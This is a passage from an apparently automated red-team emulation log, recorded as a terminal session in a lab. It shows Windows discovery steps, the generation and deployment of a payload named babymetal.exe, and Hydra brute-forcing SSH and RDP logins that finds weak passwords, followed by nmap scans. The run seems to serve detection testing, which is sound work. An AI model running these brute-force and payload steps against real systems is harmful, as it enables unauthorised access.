\u001b[0m\r\n\u001b[104m Virtual or Real: Determine if the system is virtualized or physical \u001b[0m\r\n"] [910.610526, "o", "'\\r\\rmodel : VirtualBox\\r\\r\\r\\r'\r\n"] [910.911601, "o", "\u001b[96mquery USERNAME env\u001b[0m\r\n"] [911.366975, "o", "{'index': 'sources', 'name': 'source_testoperation__1623221536.0781682', 'rules': [], 'relationships': [], 'facts': []}\r\n"] [911.374615, "o", "Got:\r\n"] [911.376091, "o", "[]\r\n"] [911.568012, "o", "\u001b[94mExecuted attack operation\u001b[0m\r\n\u001b[104m PAW: target2w Group: red_windows Ability: c0da588f-79f0-4263-8998-7496b1a40596 \u001b[0m\r\n\u001b[104m Identify active user: Find user running agent \u001b[0m\r\n"] [961.634485, "o", "'AttackX\\r'\r\n"] [961.922261, "o", "\u001b[96mNetwork configuration discovery. Original is some WMI, here we are using nbstat\u001b[0m\r\n"] [962.354441, "o", "{'index': 'sources', 'name': 'source_testoperation__1623221587.0888445', 'rules': [], 'relationships': [], 'facts': []}\r\n"] [962.361309, "o", "Got:\r\n"] [962.363184, "o", "[]\r\n"] [962.565536, "o", "\u001b[94mExecuted attack operation\u001b[0m\r\n\u001b[104m PAW: target2w Group: red_windows Ability: 14a21534-350f-4d83-9dd7-3c56b93a0c17 \u001b[0m\r\n\u001b[104m Find Domain: Find Domain information \u001b[0m\r\n"] [1022.651477, "o", "(' \\r'\r\n 'Ethernet:\\r'\r\n 'Node IpAddress: [10.0.2.15] Scope Id: []\\r'\r\n '\\r'\r\n ' NetBIOS Local Name Table\\r'\r\n '\\r'\r\n ' Name Type Status\\r'\r\n ' ---------------------------------------------\\r'\r\n ' TARGET2W <00> UNIQUE Registered \\r'\r\n ' WORKGROUP <00> GROUP Registered \\r'\r\n ' TARGET2W <20> UNIQUE Registered \\r'\r\n ' \\r'\r\n 'Ethernet 2:\\r'\r\n 'Node IpAddress: [192.168.178.189] Scope Id: []\\r'\r\n '\\r'\r\n ' NetBIOS Local Name Table\\r'\r\n '\\r'\r\n ' Name Type Status\\r'\r\n "] [1022.651596, "o", "' ---------------------------------------------\\r'\r\n ' TARGET2W <00> UNIQUE Registered \\r'\r\n ' WORKGROUP <00> GROUP Registered \\r'\r\n ' TARGET2W <20> UNIQUE Registered \\r')\r\n"] [1022.975533, "o", "\u001b[96mSystem info discovery, as close as it gets\u001b[0m\r\n"] [1023.474736, "o", "{'index': 'sources', 'name': 'source_testoperation__1623221648.1421063', 'rules': [], 'relationships': [], 'facts': []}\r\n"] [1023.480623, "o", "Got:\r\n"] [1023.482996, "o", "[]\r\n"] [1023.687796, "o", "\u001b[94mExecuted attack operation\u001b[0m\r\n\u001b[104m PAW: target2w Group: red_windows Ability: b6b105b9-41dc-490b-bc5c-80d699b82ce8 \u001b[0m\r\n\u001b[104m Find OS Version: Find OS Version \u001b[0m\r\n"] [1053.731621, "o", "('\\r'\r\n 'Major Minor Build Revision\\r'\r\n '----- ----- ----- --------\\r'\r\n '10 0 19042 0 \\r'\r\n '\\r'\r\n '\\r')\r\n"] [1054.052628, "o", "\u001b[96mTake screenshot\u001b[0m\r\n"] [1054.464586, "o", "{'index': 'sources', 'name': 'source_testoperation__1623221679.219213', 'rules': [], 'relationships': [], 'facts': []}\r\n"] [1054.469042, "o", "Got:\r\n"] [1054.470495, "o", "[]\r\n"] [1054.651863, "o", "\u001b[94mExecuted attack operation\u001b[0m\r\n\u001b[104m PAW: target2w Group: red_windows Ability: 316251ed-6a28-4013-812b-ddf5b5b007f8 \u001b[0m\r\n\u001b[104m Screen Capture: capture the contents of the screen \u001b[0m\r\n"] [1124.744184, "o", "('Exception calling \"CopyFromScreen\" with \"3\" argument(s): \"The handle is '\r\n 'invalid\"\\r'\r\n 'At line:1 char:252\\r'\r\n '+ ... ge($bmp); $graphics.CopyFromScreen($bounds.Location, [Drawing.Point '\r\n '...\\r'\r\n '+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\r'\r\n ' + CategoryInfo : NotSpecified: (:) [], '\r\n 'MethodInvocationException\\r'\r\n ' + FullyQualifiedErrorId : Win32Exception\\r'\r\n ' \\r')\r\n"] [1125.047509, "o", "\u001b[92mEnd Step 3: Target Assessment\u001b[0m\r\n\u001b[94mStep 4: Staging Interactive Toolkit\u001b[0m\r\n\u001b[96mCreate babymetal replacement\u001b[0m\r\n"] [1129.833274, "o", "No encoder specified, outputting raw payload\r\nPayload size: 1032344 bytes\r\nFinal size of elf file: 1032344 bytes\r\n"] [1129.835002, "o", "Saved as: babymetal.exe\r\n"] [1129.880806, "o", "Command exited with status 0.\r\n(no stdout)\r\n=== stderr ===\r\nNo encoder specified, outputting raw payload\r\nPayload size: 1032344 bytes\r\nFinal size of elf file: 1032344 bytes\r\nSaved as: babymetal.exe\r\n\r\nDebug: Stderr: No encoder specified, outputting raw payload\r\nPayload size: 1032344 bytes\r\nFinal size of elf file: 1032344 bytes\r\nSaved as: babymetal.exe\r\n"] [1129.943892, "o", "\u001b[96mGenerated babymetal.exe...deploying it\u001b[0m\r\n"] [1129.994568, "o", "None\r\n"] [1129.994607, "o", "\u001b[96mExecuted payload babymetal.exe on target2 \u001b[0m\r\n\u001b[92mEnd Step 4: Staging Interactive Toolkit\u001b[0m\r\n\u001b[94mStep 5: Escalate Privileges\u001b[0m\r\n\u001b[92mEnd Step 5: Escalate Privileges\u001b[0m"] [1129.994741, "o", "\r\n\u001b[94mStep 6: Expand Access\u001b[0m\r\n\u001b[92mEnd Step 6: Expand Access\u001b[0m\r\n\u001b[94mStep 7: Setup User Monitoring\u001b[0m\r\n\u001b[92mEnd Step 7: Setup User Monitoring\u001b[0m\r\n\u001b[94mStep 8: User Monitoring\u001b[0m\r\n\u001b[92mEnd Step 8: User Monitoring\u001b[0m\r\n\u001b[94mStep 9: Setup Shim Persistence\u001b[0m\r\n\u001b[92mEnd Step 9: Setup Shim Persistence\u001b[0m\r\n\u001b[94mStep 10: Steal Payment Data\u001b[0m\r\n\u001b[92mEnd Step 10: Steal Payment Data\u001b[0m\r\n"] [1134.999777, "o", "Attacking machine with PAW: target3 with attack: hydra\r\n"] [1135.011154, "o", "zsh:cd:1: no such file or directory: None\r\n"] [1135.020669, "o", "\r\nWARNING: apt does not have a stable CLI interface. Use with caution in scripts.\r\n\r\n"] [1135.025903, "o", "Reading package lists..."] [1135.05476, "o", "\r\n"] [1135.056144, "o", "Building dependency tree..."] [1135.180674, "o", "\r\nReading state information..."] [1135.183021, "o", "\r\n"] [1135.34485, "o", "hydra is already the newest version (9.1-1).\r\n0 upgraded, 0 newly installed, 0 to remove and 1389 not upgraded.\r\n"] [1135.399219, "o", "Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\r\n\r\n"] [1135.39932, "o", "Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-06-09 02:55:59\r\n"] [1135.399495, "o", "[DATA] max 16 tasks per 1 server, overall 16 tasks, 40 login tries (l:5/p:8), ~3 tries per task\r\n[DATA] attacking ssh://192.168.178.145:22/\r\n"] [1135.399547, "o", "[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4\r\n"] [1135.898263, "o", "[22][ssh] host: 192.168.178.145 login: test password: test\r\n"] [1138.064322, "o", "[22][ssh] host: 192.168.178.145 login: password password: passw0rd\r\n"] [1143.558955, "o", "[ERROR] 1 target did not resolve or could not be connected\r\n[ERROR] 0 target did not complete\r\n"] [1143.559084, "o", "1 of 1 target successfully completed, 2 valid passwords found\r\n[WARNING] Writing restore file because 1 final worker threads did not complete until end.\r\nHydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-06-09 02:56:07\r\n"] [1143.58797, "o", "Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\r\n\r\n"] [1143.588112, "o", "Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-06-09 02:56:07\r\n[WARNING] the rdp module is experimental. Please test, report - and if possible, fix.\r\n"] [1143.588226, "o", "[WARNING] rdp servers often don't like many connections, use -t 1 or -t 4 to reduce the number of parallel connections and -W 1 or -W 3 to wait between connection to allow the server to recover\r\n[INFO] Reduced number of tasks to 4 (rdp does not like many parallel connections)\r\n"] [1143.588418, "o", "[DATA] max 4 tasks per 1 server, overall 4 tasks, 40 login tries (l:5/p:8), ~10 tries per task\r\n[DATA] attacking rdp://192.168.178.145:3389/\r\n"] [1144.144217, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: qwertz, continuing attacking the account.\r\n"] [1144.148391, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: qwert, continuing attacking the account.\r\n"] [1144.148795, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: password, continuing attacking the account.\r\n"] [1144.149246, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: 12345, continuing attacking the account.\r\n"] [1144.157408, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: qwerty, continuing attacking the account.\r\n"] [1144.159518, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: swordfish, continuing attacking the account.\r\n"] [1144.160769, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: passw0rd, continuing attacking the account.\r\n"] [1144.161189, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: test, continuing attacking the account.\r\n"] [1144.169608, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: 12345, continuing attacking the account.\r\n"] [1144.169715, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: qwert, continuing attacking the account.\r\n"] [1144.170303, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: qwerty, continuing attacking the account.\r\n"] [1144.170512, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: qwertz, continuing attacking the account.\r\n"] [1144.178448, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: swordfish, continuing attacking the account.\r\n"] [1144.179424, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: test, continuing attacking the account.\r\n"] [1144.179691, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: password, continuing attacking the account.\r\n"] [1144.18033, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: passw0rd, continuing attacking the account.\r\n"] [1144.188691, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: qwertz, continuing attacking the account.\r\n"] [1144.189722, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: qwert, continuing attacking the account.\r\n"] [1144.191904, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: 12345, continuing attacking the account.\r\n"] [1144.193944, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: qwerty, continuing attacking the account.\r\n"] [1144.199675, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: test, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: swordfish, continuing attacking the account.\r\n"] [1144.200299, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: password, continuing attacking the account.\r\n"] [1144.200436, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: passw0rd, continuing attacking the account.\r\n"] [1144.209136, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: qwert, continuing attacking the account.\r\n"] [1144.20928, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: qwerty, continuing attacking the account.\r\n"] [1144.209856, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: qwertz, continuing attacking the account.\r\n"] [1144.210193, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: 12345, continuing attacking the account.\r\n"] [1144.219171, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: swordfish, continuing attacking the account.\r\n"] [1144.219851, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: passw0rd, continuing attacking the account.\r\n"] [1144.220367, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: password, continuing attacking the account.\r\n"] [1144.220713, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: test, continuing attacking the account.\r\n"] [1144.229099, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: qwert, continuing attacking the account.\r\n"] [1144.229789, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: qwertz, continuing attacking the account.\r\n"] [1144.23002, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: qwerty, continuing attacking the account.\r\n"] [1144.230646, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: 12345, continuing attacking the account.\r\n"] [1144.239324, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: swordfish, continuing attacking the account.\r\n"] [1144.239896, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: passw0rd, continuing attacking the account.\r\n"] [1144.24068, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: password, continuing attacking the account.\r\n"] [1144.241006, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: test, continuing attacking the account.\r\n"] [1144.247662, "o", "1 of 1 target completed, 0 valid password found\r\nHydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-06-09 02:56:08\r\n"] [1144.255595, "o", "Command exited with status 0.\r\n=== stdout ===\r\nReading package lists...\r\nBuilding dependency tree...\r\nReading state information...\r\nhydra is already the newest version (9.1-1).\r\n0 upgraded, 0 newly installed, 0 to remove and 1389 not upgraded.\r\nHydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\r\n\r\nHydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-06-09 02:55:59\r\n[DATA] max 16 tasks per 1 server, overall 16 tasks, 40 login tries (l:5/p:8), ~3 tries per task\r\n[DATA] attacking ssh://192.168.178.145:22/\r\n[22][ssh] host: 192.168.178.145 login: test password: test\r\n[22][ssh] host: 192.168.178.145 login: password password: passw0rd\r\n1 of 1 target successfully completed, 2 valid passwords found\r\n[WARNING] Writing restore file because 1 final worker threads did not complete until end.\r\nHydra (https://github.com/vanhauser-thc/thc-hydra) fi"] [1144.255716, "o", "nished at 2021-06-09 02:56:07\r\nHydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\r\n\r\nHydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-06-09 02:56:07\r\n[WARNING] the rdp module is experimental. Please test, report - and if possible, fix.\r\n[DATA] max 4 tasks per 1 server, overall 4 tasks, 40 login tries (l:5/p:8), ~10 tries per task\r\n[DATA] attacking rdp://192.168.178.145:3389/\r\n1 of 1 target completed, 0 valid password found\r\nHydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-06-09 02:56:08\r\n\r\n=== stderr ===\r\nzsh:cd:1: no such file or directory: None\r\n\r\nWARNING: apt does not have a stable CLI interface. Use with caution in scripts.\r\n\r\n[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4\r\n[ERROR] 1 target did not resolve or could not be connected\r\n[ERROR] 0 t"] [1144.255769, "o", "arget did not complete\r\n[WARNING] rdp servers often don't like many connections, use -t 1 or -t 4 to reduce the number of parallel connections and -W 1 or -W 3 to wait between connection to allow the server to recover\r\n[INFO] Reduced number of tasks to 4 (rdp does not like many parallel connections)\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: qwertz, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: qwert, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: password, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: 12345, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not acti"] [1144.255809, "o", "ve for remote desktop: login: test password: qwerty, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: swordfish, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: passw0rd, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: test, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: 12345, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: qwert, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: qwerty"] [1144.255849, "o", ", continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: qwertz, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: swordfish, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: test, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: password, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: passw0rd, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: qwertz, continuing attacking the account.\r\n[3389]"] [1144.25588, "o", "[rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: qwert, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: 12345, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: qwerty, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: test, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: swordfish, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: password, continuing attacking the account.\r\n[3389][rdp] account on 192.168.17"] [1144.255921, "o", "8.145 might be valid but account not active for remote desktop: login: password password: passw0rd, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: qwert, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: qwerty, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: qwertz, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: 12345, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: swordfish, continuing attacking the account.\r\n[3389][r"] [1144.255953, "o", "dp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: passw0rd, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: password, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: test, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: qwert, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: qwertz, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: qwerty, continuing"] [1144.255987, "o", " attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: 12345, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: swordfish, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: passw0rd, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: password, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: test, continuing attacking the account.\r\n\r\nDebug: Stderr: zsh:cd:1: no such file or directory: None\r\n\r\nWARNING: apt does not have a stable CLI interface. Us"] [1144.256016, "o", "e with caution in scripts.\r\n\r\n[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4\r\n[ERROR] 1 target did not resolve or could not be connected\r\n[ERROR] 0 target did not complete\r\n[WARNING] rdp servers often don't like many connections, use -t 1 or -t 4 to reduce the number of parallel connections and -W 1 or -W 3 to wait between connection to allow the server to recover\r\n[INFO] Reduced number of tasks to 4 (rdp does not like many parallel connections)\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: qwertz, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: qwert, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: password, continuing attacking the account.\r\n[3389][rdp] acc"] [1144.256047, "o", "ount on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: 12345, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: qwerty, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: swordfish, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: passw0rd, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: test, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: 12345, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account "] [1144.256075, "o", "not active for remote desktop: login: root password: qwert, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: qwerty, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: qwertz, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: swordfish, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: test, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: password, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root passwor"] [1144.256105, "o", "d: passw0rd, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: qwertz, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: qwert, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: 12345, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: qwerty, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: test, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: swordfish, continuing attac"] [1144.256136, "o", "king the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: password, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: passw0rd, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: qwert, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: qwerty, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: qwertz, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: 12345, co"] [1144.256166, "o", "ntinuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: swordfish, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: passw0rd, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: password, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: test, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: qwert, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: non"] [1144.256191, "o", "existend_user_2 password: qwertz, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: qwerty, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: 12345, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: swordfish, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: passw0rd, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: password, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not"] [1144.256222, "o", " active for remote desktop: login: nonexistend_user_2 password: test, continuing attacking the account.\r\n"] [1149.257446, "o", "Attacking machine with PAW: target3 with attack: nmap\r\n"] [1149.263047, "o", "zsh:cd:1: no such file or directory: None\r\n"] [1149.290654, "o", "Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-09 02:56 EDT\r\n"] [1149.386065, "o", "Nmap scan report for target3.fritz.box (192.168.178.145)\r\nHost is up (0.00015s latency).\r\nNot shown: 999 closed ports\r\nPORT STATE SERVICE\r\n22/tcp open ssh\r\n\r\n"] [1149.38617, "o", "Nmap done: 1 IP address (1 host up) scanned in 0.12 seconds\r\n"] [1149.392608, "o", "Command exited with status 0.\r\n=== stdout ===\r\nStarting Nmap 7.91 ( https://nmap.org ) at 2021-06-09 02:56 EDT\r\nNmap scan report for target3.fritz.box (192.168.178.145)\r\nHost is up (0.00015s latency).\r\nNot shown: 999 closed ports\r\nPORT STATE SERVICE\r\n22/tcp open ssh\r\n\r\nNmap done: 1 IP address (1 host up) scanned in 0.12 seconds\r\n\r\n=== stderr ===\r\nzsh:cd:1: no such file or directory: None\r\n\r\nDebug: Stderr: zsh:cd:1: no such file or directory: None\r\n"] [1154.397646, "o", "Attacking machine with PAW: target3 with attack: nmap_stresstest\r\n"] [1154.404994, "o", "zsh:cd:1: no such file or directory: None\r\n"] [1154.430451, "o", "Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-09 02:56 EDT\r\n"] [1154.466996, "o", "Nmap scan report for target3.fritz.box (192.168.178.145)\r\nHost is up (0.00015s latency).\r\nNot shown: 999 closed ports\r\nPORT STATE SERVICE\r\n22/tcp open ssh\r\n\r\n"] [1154.467118, "o", "Nmap done: 1 IP address (1 host up) scanned in 0.06 seconds\r\n"] [1154.474324, "o", "Command exited with status 0.\r\n=== stdout ===\r\nStarting Nmap 7.91 ( https://nmap.org ) at 2021-06-09 02:56 EDT\r\nNmap scan report for target3.fritz.box (192.168.178.145)\r\nHost is up (0.00015s latency).\r\nNot shown: 999 closed ports\r\nPORT STATE SERVICE\r\n22/tcp open ssh\r\n\r\nNmap done: 1 IP address (1 host up) scanned in 0.06 seconds\r\n\r\n=== stderr ===\r\nzsh:cd:1: no such file or directory: None\r\n\r\n"] [1154.474419, "o", "Debug: Stderr: zsh:cd:1: no such file or directory: None\r\n"] [1159.477456, "o", "\u001b[92mFinished Kali attacks\u001b[0m\r\n"] [1159.69311, "o", "Command exited with status 0.\r\n(no stdout)\r\n(no stderr)\r\n"] [1169.750938, "o", "Could Not Find C:\\capture\\winidp_data.zip\r\r\n"] [1169.765534, "o", "Command exited with status 0.\r\n(no 